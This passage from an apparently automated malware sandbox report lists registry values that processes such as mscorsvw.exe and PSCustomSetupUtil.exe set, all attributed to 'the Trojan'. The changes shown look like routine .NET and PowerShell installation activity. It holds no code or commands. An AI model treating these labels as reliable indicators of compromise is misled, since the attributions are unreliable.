[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\736e1f8\4a6241f9\5a\InvertDependencies\2042d09e\663d72dd]
"60" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"Status" = "2"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index58]
The process mscorsvw.exe:3680 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "97 1B B9 A6 72 63 7D 68 7F 3F 11 6E 55 A3 6A EC"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"
The process mscorsvw.exe:3440 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F3 7F A0 78 48 A1 12 6D E6 8C 8E 56 41 24 C9 05"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
The process mscorsvw.exe:1388 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AB C0 BE 74 1C 30 7A 32 D8 11 99 01 69 F1 1B C5"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
The process mscorsvw.exe:2256 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "30 CF BA 76 90 42 0C FD C2 17 56 7A 05 7A 74 26"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
The process mscorsvw.exe:1152 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6C ED 02 F3 08 6F B7 77 CD A3 0E D5 9B 9C AD 07"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
The process PSCustomSetupUtil.exe:3592 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AE 81 20 9E 6B 89 04 EE 29 0A D1 BC 75 64 33 A3"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.BackgroundIntelligentTransfer.Management,1.0.0.0,,31bf3856ad364e35,MSIL" = "E8 67 C2 E8 3A 47 D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.BackgroundIntelligentTransfer.Management, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "195"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "196"
"StoreChangeIDFor64BitProcesses" = "174"
"StoreChangeIDFor32BitProcesses" = "195"
The process PSCustomSetupUtil.exe:3496 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EE 7D 22 5D 72 95 DB 06 B2 78 F3 77 30 72 92 C5"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Diagnostics,1.0.0.0,,31bf3856ad364e35,MSIL" = "46 0B 44 E8 3A 47 D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Diagnostics, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "192"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "193"
"StoreChangeIDFor64BitProcesses" = "171"
"StoreChangeIDFor32BitProcesses" = "192"
The process PSCustomSetupUtil.exe:3828 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "56 8E 52 A4 31 DB A1 91 6A 8F 8C 33 37 B3 FC D1"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.WSMan.Management.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.WSMan.Management.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "04 E3 01 EA 3A 47 D1 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "202"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "203"
"StoreChangeIDFor64BitProcesses" = "181"
"StoreChangeIDFor32BitProcesses" = "202"
The process PSCustomSetupUtil.exe:2096 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "15 70 94 70 47 41 0F 44 5B F0 06 B2 59 71 00 28"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.GraphicalHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.GraphicalHost,1.0.0.0,,31bf3856ad364e35,MSIL" = "38 98 01 ED 3A 47 D1 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "204"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "205"
"StoreChangeIDFor64BitProcesses" = "183"
"StoreChangeIDFor32BitProcesses" = "204"
The process PSCustomSetupUtil.exe:3732 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C3 76 20 53 1F 84 B8 FB 7F AD 0D AD 96 14 97 F5"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "199"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "200"
"Microsoft.PowerShell.Commands.Utility.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "46 38 75 E9 3A 47 D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Utility.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "178"
"StoreChangeIDFor32BitProcesses" = "199"
The process PSCustomSetupUtil.exe:3652 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F1 91 8F 47 D4 73 D4 2D CF BE 09 C2 2B 3C F2 AA"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.ConsoleHost.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.ConsoleHost.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "F8 C5 21 E9 3A 47 D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "197"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "198"
"StoreChangeIDFor64BitProcesses" = "176"
"StoreChangeIDFor32BitProcesses" = "197"
The process PSCustomSetupUtil.exe:3692 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "35 5B D3 E7 FA 73 1B 15 5F 4D 0B AE 68 4D 47 63"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Management.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "4C B0 4C E9 3A 47 D1 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "198"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "199"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Management.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "177"
"StoreChangeIDFor32BitProcesses" = "198"
The process PSCustomSetupUtil.exe:3856 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9E 26 35 83 36 A1 9A 94 E0 C6 E3 77 4C 95 2C 71"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.BackgroundIntelligentTransfer.Management.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.BackgroundIntelligentTransfer.Management.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "4A A6 25 EA 3A 47 D1 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "203"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "204"
"StoreChangeIDFor64BitProcesses" = "182"
"StoreChangeIDFor32BitProcesses" = "203"
The process PSCustomSetupUtil.exe:2176 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C8 F0 DB 85 86 99 07 7B A7 99 9A B7 2D 0A BA FD"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.GraphicalHost.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "207"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.GraphicalHost.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "A2 58 63 ED 3A 47 D1 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "208"
"StoreChangeIDFor64BitProcesses" = "186"
"StoreChangeIDFor32BitProcesses" = "207"
The process PSCustomSetupUtil.exe:2072 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "89 4E A6 30 FD 4D 03 63 4B 85 83 85 92 E0 2B 7F"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\System\CurrentControlSet\Control\Session Manager\Environment]
"PATHEXT" = ".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.PSC1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
The process PSCustomSetupUtil.exe:2288 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8C C0 B9 F1 8A BC B0 AC 03 CA 21 1E 16 C5 71 0C"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.GPowerShell.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "C6 55 A1 ED 3A 47 D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.GPowerShell.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "210"
"StoreChangeIDFor64BitProcesses" = "188"
"StoreChangeIDFor32BitProcesses" = "209"
The process PSCustomSetupUtil.exe:3628 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "13 B8 88 E1 9F 9E 8C E8 73 BE 6C CE B3 DB 53 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "196"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "197"
"System.Management.Automation.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "FE 3D F9 E8 3A 47 D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\References\System.Management.Automation.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "175"
"StoreChangeIDFor32BitProcesses" = "196"
The process PSCustomSetupUtil.exe:3400 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C2 6B 5E 0B A0 B9 94 41 1F BF D2 8D 12 F4 90 5E"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Management,1.0.0.0,,31bf3856ad364e35,MSIL" = "58 73 CA E7 3A 47 D1 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "189"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Management, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "190"
"StoreChangeIDFor64BitProcesses" = "168"
"StoreChangeIDFor32BitProcesses" = "189"
The process PSCustomSetupUtil.exe:3520 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2A D5 BE 0F F3 E6 44 E5 E4 A1 96 7A 7A 6C 5C CF"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.WSMan.Runtime, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "193"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.WSMan.Runtime,1.0.0.0,,31bf3856ad364e35,MSIL" = "40 93 6C E8 3A 47 D1 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "194"
"StoreChangeIDFor64BitProcesses" = "172"
"StoreChangeIDFor32BitProcesses" = "193"
The process PSCustomSetupUtil.exe:3756 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "13 3D 61 DC 52 99 4A 3F 23 16 72 38 07 12 4B DD"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Security.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "02 AC A9 E9 3A 47 D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Security.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "200"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "201"
"StoreChangeIDFor64BitProcesses" = "179"
"StoreChangeIDFor32BitProcesses" = "200"
The process PSCustomSetupUtil.exe:3544 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C9 97 74 1B A2 94 5A 19 A3 CB 9E 18 B0 6A 98 89"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.WSMan.Management, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.WSMan.Management,1.0.0.0,,31bf3856ad364e35,MSIL" = "EE DF 99 E8 3A 47 D1 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "194"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "195"
"StoreChangeIDFor64BitProcesses" = "173"
"StoreChangeIDFor32BitProcesses" = "194"
The process PSCustomSetupUtil.exe:3780 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AA 1E 31 8A 56 34 40 7F 35 A5 9B 2A A8 7E B3 28"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Diagnostics.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "56 96 D4 E9 3A 47 D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "201"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "202"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Diagnostics.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "180"
"StoreChangeIDFor32BitProcesses" = "201"
The process PSCustomSetupUtil.exe:3464 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3B 9A F3 61 D4 82 9A D9 94 08 6D 15 F7 AD 8E F9"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Security,1.0.0.0,,31bf3856ad364e35,MSIL" = "A6 E5 1D E8 3A 47 D1 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "191"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "192"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Security, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "170"
"StoreChangeIDFor32BitProcesses" = "191"
The process PSCustomSetupUtil.exe:3332 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "27 D2 1A 51 76 B3 9A 52 FC C0 67 80 17 3A BD 14"
[HKLM\SOFTWARE\Microsoft\Fusion\References\System.Management.Automation, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"System.Management.Automation,1.0.0.0,,31bf3856ad364e35,MSIL" = "64 63 79 E7 3A 47 D1 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "187"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "188"
"StoreChangeIDFor64BitProcesses" = "166"
"StoreChangeIDFor32BitProcesses" = "187"
The process PSCustomSetupUtil.exe:3376 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5D FC 4F 87 AB 69 C8 D5 24 12 A3 54 EA 65 81 44"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
